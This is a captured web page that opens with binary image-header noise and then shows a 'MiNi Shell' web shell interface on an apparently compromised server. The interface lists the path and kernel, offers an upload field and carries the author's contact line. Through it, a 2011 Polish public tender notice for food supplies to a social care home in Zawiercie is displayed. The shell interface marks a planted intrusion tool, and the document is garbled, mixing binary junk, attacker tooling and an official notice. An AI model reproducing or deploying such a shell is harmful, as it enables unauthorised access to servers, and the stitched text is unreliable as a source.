JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/322247-N-2011.html

<p class="kh_header"><b>Zawiercie: Dostawę artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zawierciu</b><br>
<b>Numer ogłoszenia: 322247 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Rzemieślnicza 9, 42-400 Zawiercie, woj. śląskie, tel. 032 6721573, faks 032 6722256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dps.zawiercie.powiat.finn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zawierciu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawę artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zawierciu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>SPECYFIKACJA ISTOTNYCH WARUNKÓW ZAMÓWIENIA

DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY
DOMU POMOCY SPOŁECZNEJ
W ZAWIERCIU


150000000-8	WSPÓLNY SŁOWNIK ZAMÓWIEŃ  (CPV)







Zamawiający:  DOM POMOCY SPOŁECZNEJ
		Ul. RZEMIEŚLNICZA 9
		42-400 ZAWIERCIE
		Tel. 326721573
		Fax. 326722256









Termin realizacji zamówienia:	od 02.01.2012 r.  do 31.12.2012 r.












SPIS TREŚCI

I.	Tryb udzielenia zamówienia
II.	Opis przedmiotu zamówienia
III.	Szczegółowy opis przedmiotu zamówienia
IV.	Termin wykonania zamówienia
V.	Opis warunków udziału w postępowaniu i opis dokonywania oceny spełnienia tych 
	warunków
VI.	Sposób porozumiewania się Zamawiający z Wykonawcą
VII.	Opis sposobu przygotowania oferty
VIII.	Dokumenty wymagane od wykonawców
IX.	Osoby upoważnione do porozumienia z Wykonawcami
X.	Miejsce i termin otwarcia ofert
XI.	Sposób obliczania ceny
XII.	Składanie ofert.
XIII.	Termin związania ofertą
XIV.	Istotne postanowienia, które zostaną wprowadzone do treści zawartej umowy
XV.	Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku 
	postępowania o udzielenie zamówienia publicznego
XVI.	Uwagi końcowe






ZAŁĄCZNIKI:

1. formularz ofertowy (załącznik nr 1)
2. zestawienie kosztów (tabele 1-7 załącznik nr 2)
3. oświadczenie zgodne z art. 22 ustawy - Prawo Zamówień Publicznych (załącznik nr 3)
4. wzór umowy (załącznik nr 4)











I.	TRYB UDZIELENIA ZAMÓWIENIA

Postępowanie prowadzone jest na zasadach przewidzianych przez ustawę z dnia 29 stycznia 2004 r.Prawo Zamówień Publicznych (tekst jednolity Dz.U.z 2010 r nr 113 poz. 759, Nr 161, poz.1078 i Nr 182, poz. 1228 oraz z 2011 r. Nr 5, poz. 13, Nr 28, poz 143 i Nr87, poz 484)
Zamówienie zostanie udzielone w trybie przetargu nieograniczonego.


II.	OPIS PRZEDMIOTU ZAMÓWIENIA


Przedmiotem niniejszego zamówienia jest dostawa artykułów żywnościowych na potrzeby Domu Pomocy Społecznej w Zawierciu wraz z dostawą i rozładunkiem w DPS Zawiercie 
ul. Rzemieślnicza 9	(magazyn)


Zamówienie realizowane będzie w podziale na wyszczególnione poniżej pakiety:

Pakiet nr 1 - Dostawa mięsa, drobiu, podrobów, wędlin i konserw mięsnych
		KOD CPV: 15100000-9, 15131130-5, 15112000-6
Pakiet nr 2 - Dostawa mleka i wyrobów mleczarskich
		KOD CPV: 15500000-3, 15511003-3
Pakiet nr 3 - Dostawa pieczywa i wyrobów ciastkarskich
		KOD CPV:-15800000-9
Pakiet nr 4 - Dostawa ryb i konserw rybnych
		KOD CPV:-15200000-0
Pakiet nr 5.-.Dostawa warzyw i owoców
		KOD CPV:-03200000-3, 15300000-1
Pakiet nr 6.-.Dostawa jaj
		KOD.CPV:-03142500-3
Pakiet nr 7.-.Dostawa pozostałych artykułów spożywczych
		KOD CPV:-15000000-6



III.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA:


Tabele:  zestawienie kosztów (tabele 1-7 załącznik nr 2)





IV.	TERMIN WYKONANIA ZAMÓWIENIA

Zamówienie będzie realizowane sukcesywnie w okresie od 02.01.2012 r. do 31.12.2012 r.
Ilość artykułów podana w tabeli posiada wartość szacunkową i realizowana będzie na podstawie zamówienia pisemnego przesłanego faksem lub składanego telefonicznie w przeddzień dostawy w następujący sposób:
- 6 razy w tygodniu (codziennie oprócz niedziel w godzinach od 5:30 do 6:30)
dla pakietu :
nr 2 Dostawa mleka i wyrobów mleczarskich
nr 3 Dostawa pieczywa i wyrobów ciastkarskich
- 3 razy w tygodniu (we wtorki, środy, czwartki w godzinach od 7:00 do 9:00)
dla pakietu
nr 1 Dostawa mięsa, drobiu, podrobów, wędlin i konserw mięsnych
- 2 razy w tygodniu (w poniedziałki, piątki w godzinach od 7:00 do 11:00)
dla pakietu
nr 5 Dostawa warzyw i owoców
nr 6 Dostawa jaj
nr 7 Dostawa pozostałych artykułów spożywczych
-1 raz w tygodniu (w środy w godzinach od 7:00 do 11:00)
dla pakietu
nr 4 Dostawa ryb i konserw rybnych

W przypadku, gdy wwymienionym terminie przypada dzień świąteczny, dostawa będzie
realizowana w dniu wcześniejszym.

V.	OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU I OPIS SPOSOBU
	DOKONYWANIA OCENY SPEŁNIENIA TYCH WARUNKÓW

Warunkiem uczestnictwa w przetargu jest złożenie ofert na dostawę żywności wraz 
z wymaganymi dokumentami.
Komisja przetargowa przy wyborze najkorzystniejszej oferty będzie się kierowała jedynym kryterium, jakim jest cena.

CENA - 100%

Sposób obliczenia punktacji:

				Cmin
a)	cena:		Pc= -------------- x 100
	`			C
Pc - liczba punktów za cenę podaną w ofercie
Cmin-najniższa cena w podanych ofertach
C - cena podana w badanej ofercie
Wybrana będzie ta oferta, która otrzyma największą liczbę punktów.

W przypadku gdy nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że złożone zostały oferty o tej samej cenie, zamawiający wezwie wykonawców, którzy złożyli oferty, do złożenia ofert dodatkowych.

Dodatkowe wymagania, jakie powinien spełnić wykonawca.

1.Wykonawca zobowiązany jest dostarczać towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
2.Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi przepisami, oraz z warunkami określonymi w SIWZ, musi posiadać aktualny termin przydatności do spożycia.
3.Wykonawca zobowiązuje się do bezpłatnego dowozu towaru (transportem spełniającym wymagania sanitarne) oraz rozładunku w magazynie DPS Zawiercie.
4.Wykonawca zabezpieczy należycie towar na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za
dostawę i jakość dostarczonego towaru.
5.Wykonawca bierze na siebie odpowiedzialność za braki i wady powstałe w czasie transportu oraz ponosi z tego tytułu wszelkie skutki prawne.
6.Ilościowy i jakościowy odbiór towaru będzie dokonywany przez Zamawiającego, w jego magazynie w oparciu o obowiązujące normy jakościowe, złożone zamówienie oraz fakturę.
7.W wyjątkowych sytuacjach zamawiający dopuszcza możliwość zmiany asortymentu oraz ilości zamawianych produktów. Powyższa zmiana musi być uzgodniona przez obie strony.
8.W przypadku dostarczenia towaru:
a) z wadami jakościowymi-Zamawiający może odmówić jego przyjęcia i żądać wymiany na towar wolny od tych wad.
b) środkiem transportu nie spełniającym wymagań sanitarnych - Zamawiający może odmówić jego przyjęcia.
c) który jest niezgodny ze złożonym w zapotrzebowaniu asortymentem i ilością - 
Zamawiający może odmówić przyjęcia dostawy.
d) z opóźnieniem w terminie dostawy - Zamawiający może odmówić jej przyjęcia.
e) z wadami jakościowymi ukrytymi, stwierdzonymi (okres przydatności do spożycia)
podczas jego magazynowania, Zamawiający zwróci go do dyspozycji Wykonawcy (na jego koszt), powiadamiając go niezwłocznie telefonicznie o stwierdzonych wadach oraz potwierdzi to przesłaniem protokołu reklamacyjnego.


VI.	SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCĄ

Porozumiewanie się między Zamawiającym a Wykonawcą oraz składanie oświadczeń, zawiadomień i dokumentów następuje w formie pisemnej bądź faksem - potwierdzonym
następnie pisemnie.


VII.	OPIS SPOSOBU PRZYGOTOWANIA OFERTY

Oferta powinna być przygotowana w formie pisemnej, w języku polskim i odpowiadać na przedstawione kwestie związane z przetargiem, według kolejności ujętej w specyfikacji istotnych warunków zamówienia oraz w formularzu ofertowym. Zamawiający dopuszcza możliwość składania ofert częściowych dla poszczególnych pakietów.
Wykonawca może złożyć tylko jedną ofertę na każdy pakiet. Wykonawca, który przedłoży więcej niż jedną ofertę na którykolwiek z pakietów, zostanie wykluczony z postępowania.
Oferty zawierające propozycję rozwiązań alternatywnych lub wariantowych nie będą rozpatrywane, ponieważ Zamawiający nie dopuszcza możliwości składania ofert wariantowych dla żadnego z pakietów.
Wykonawca, który składa ofertę na całość zamówienia, pakiet lub kilka pakietów, przedkłada
wszystkie dokumenty. Oferta powinna być podpisana przez osobę upoważnioną do działania w imieniu Wykonawcy oraz zawierać wymagane ustawą Prawo Zamówień Publicznych załączniki i oświadczenia, a także informacje żądane w specyfikacji istotnych warunków zamówienia. Upoważnienie do podpisania oferty powinno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę (np. wypis z właściwego rejestru, zaświadczenie o wpisie do ewidencji działalności gospodarczej).
Zamawiający dopuszcza składanie ofert przez wielu Wykonawców. W przypadku składania oferty łącznej, do oferty powinny zostać dołączone dokumenty potwierdzające ustanowienie pełnomocnika do reprezentowania tych że Wykonawców w postępowaniu i zawarcia umowy.
Wykonawca zobowiązany jest do wskazania w ofercie części zadania, które powierzy podwykonawcom.
Wszystkie strony oferty powinny być zaparafowane przez osobę podpisującą ofertę.
Każda strona oferty musi być ponumerowana kolejnymi numerami. Oferta powinna być
trwale zszyta. Poprawki dokonywane w ofercie muszą być jednoznaczne, czytelne 
i zrozumiałe oraz zaparafowane przez osobę podpisującą ofertę. W przeciwnym wypadku informacje poprawione, przekreślone lub nieczytelne będą traktowane jako brak odpowiedzi.
Ofertę należ złożyć w nieprzeźroczystej, zamkniętej kopercie, oznaczonej następująco:


	-nazwa i adres Wykonawcy
	-przedmiot zamówienia


Oferta na dostawę artykułów żywnościowych na potrzeby Domu Pomocy Społecznej
w Zawierciu 	pakiet nr




Wszystkie dokumenty złożone w prowadzonym postępowaniu są jawne, z wyjątkiem informacji zastrzeżonych przez składającego ofertę.
Informacje zawarte w ofercie, stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji - co do których wykonawca zastrzegł, nie później niż w terminie składania ofert, że nie mogą być udostępniane  -  muszą być oznaczone klauzulą: Nie udostępniać - informacje stanowią tajemnicę przedsiębiorstwa - i załączone jako odrębna część nie złączona z ofertą w sposób trwały.

Wykonawca nie może zastrzec informacji i dokumentów, których jawność wynika z innych
aktów prawnych, w tym między innymi z zapisu art. 86 ust. 4 Ustawy Prawo Zamówień Publicznych.
Wykonawca może wprowadzić zmiany lub wycofać złożoną ofertę pod warunkiem, że
Zamawiający otrzyma przed terminem składania ofert pisemne powiadomienie 
o wprowadzeniu zmian lub wycofaniu oferty. Zmiany te muszą zostać przygotowane 
i oznaczone tak jak oferta, dodatkowo koperta powinna zostać oznaczona określonymi:
Zmiana lub Wycofanie.
Oferty złożone po terminie składania ofert zostaną zwrócone Wykonawcom bez ich otwierania, po upływie terminu przewidzianego na wniesienie odwołania. Zamawiający przedłuża termin składania ofert, jeżeli w wyniku modyfikacji treści specyfikacji istotnych warunków zamówienia niezbędny jest dodatkowy czas na wprowadzenie zmian w ofertach.
Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty.

VIII.	DOKUMENTY WYMAGANE OD WYKONAWCÓW

Do oferty powinny być dostarczone wszystkie dokumenty i oświadczenia wymagane odpowiednimi postanowieniami specyfikacji.

Kompletna oferta powinna zawierać:

1. wypełniony formularz ofertowy (załącznik nr 1)
2. zestawienie kosztów tabele od nr 1 do nr 7 w zależności, na który pakiet składana jest oferta (załącznik nr 2)
3. oświadczenie o spełnieniu warunków wynikających z art. 22 oraz nie podlega wykluczeniu na podstawie  art. 24 ustawy z dnia 24 stycznia 2004 r. Prawo Zamówień Publicznych (załącznik nr 3)
4. zaakceptowany wzór umowy (załącznik nr 4)
5. zaświadczenie o wpisie do ewidencji działalności gospodarczej lub innego właściwego rejestru (wystawione nie później niż na 6 miesiące przed upływem terminu składania ofert)
6. zaświadczenie  decyzję o spełnieniu wymogów sanitarnych dotyczących środka transportu, zgodnie z obowiązującymi  w tym zakresie przepisami
7. umowę regulującą współpracę podmiotów występujących wspólnie jako jeden Wykonawca - jeśli dotyczy
8. upoważnienie do podpisania oferty, w przypadku gdy oferta zostanie podpisana przez osobę, których uprawnienie do dokonania tej czynności nie wynika z innych dokumentów dołączonych do oferty
Dokumenty mogą być składane w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez upoważnionego Wykonawcę. Zamawiający będzie żądał przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia dokumentu będzie nieczytelna lub będzie budzić uzasadnione wątpliwości co do jej prawdziwości, a Zamawiający nie będzie mógł sprawdzić jej prawdziwości w inny sposób.

Zamawiający wykluczy z postępowania Wykonawców o których mowa w art. 24 ustawy Prawo Zamówień Publicznych.
Zamawiający odrzuca ofertę, jeżeli:
1.jest niezgodna z ustawą
2.jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia
3.jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji
4.zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia
5.została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia
6. zawiera błędy w obliczeniu ceny
7.wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgłosił się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy 
8.jest nieważna na podstawie odrębnych przepisów

IX.	OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI

Osobą uprawnioną do bezpośredniego kontaktowania się w zakresie przedmiotu zamówienia jest p. Jadwiga Olesik tel. 32 6721573 wew. 21.

X.	SKŁADANIE OFERT

Oferty należy złożyć w terminie do 15.12.2011 r. do godziny 9:00 w siedzibie Zamawiającego przy ul. Rzemieślniczej 9  w sekretariacie.

XI.	MIEJSCE ORAZ TERMIN OTWARCIA OFERT

Otwarcie ofert nastąpi w dniu 15.12.2011 o godzinie 9:30 w siedzibie Zamawiającego w dziale zaopatrzenia. Otwarcia ofert dokona komisja przetargowa. Publiczne otwarcie ofert zostanie przeprowadzone zgodnie wymaganiami art. 86 ustawy Prawo Zamówień Publicznych oraz z zasadami podanymi w niniejszej specyfikacji.


XII.	SPOSÓB OBLICZANIA CENY OFERTY

Cenę ofertową dla każdego pakietu stanowi suma wartości brutto wszystkich wyszczególnionych towarów. Cena ofertowa powinna być podana w złotych polskich 
( słownie + cyfrowa ).

XIII.	TERMIN ZWIĄZANIA OFERTĄ

Wykonawca pozostanie związany złożoną ofertą przez okres 30 dni. Bieg terminu rozpoczyna się wraz z upływem terminu składania ofert. W uzasadnionych przypadkach na co najmniej 
3 dni przed upływem terminu związania ofertą, Zamawiający może tylko raz zwrócić się do Wykonawców o wyrażenie zgody na przedłużenie tego terminu o oznaczony okres, nie dłuższy jednak niż 60 dni.

XIV.	ISTOTNE POSTANOWIENIA KTÓRE ZOSTANĄ WPROWADZONE DO 
	TREŚCI ZAWARTEJ UMOWY.

Zamawiający zawrze umowę z wybranym Wykonawcą w terminie nie krótszym niż 7 dni od dnia ogłoszenia o wyniku przetargu, nie później jednak niż przed upływem terminu związania ofertą, na warunkach będących istotnymi postanowieniami, a stanowiącymi wzór umowy załącznik nr 4.

XV.	POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO

Wykonawcom biorącym udział w niniejszym postępowaniu, których interes prawny dozna uszczerbku w wyniku naruszenia przez Zamawiającego określonych w ustawie zasad udzielania zamówień, przysługują środki ochrony prawnej w formie odwołania - określone w dziale VI ustawy.

XVI.	UWAGI KOŃCOWE

Ogłoszenie o wyborze najkorzystniejszej oferty zostanie zamieszczone na tablicy ogłoszeń Domu Pomocy Społecznej w Zawierciu, na stronie Biuletynu Informacji Publicznej DPS oraz przesłane do uczestników postępowania.

SIWZ można otrzymać Domu Pomocy Społecznej w Zawierciu ul. Rzemieślnicza 9 lub na stronie internetowej	bip.dps.zawiercie.powiat.finn.pl


										Zatwierdzam:
Zawiercie dnia 7.12.2011 r.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dps.zawiercie.powiat.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
42-400 Zawiercie
ul. Rzemieślnicza 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 09:00, miejsce: Dom Pomocy Społecznej
42-400 Zawiercie
ul. Rzemieślnicza 9 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com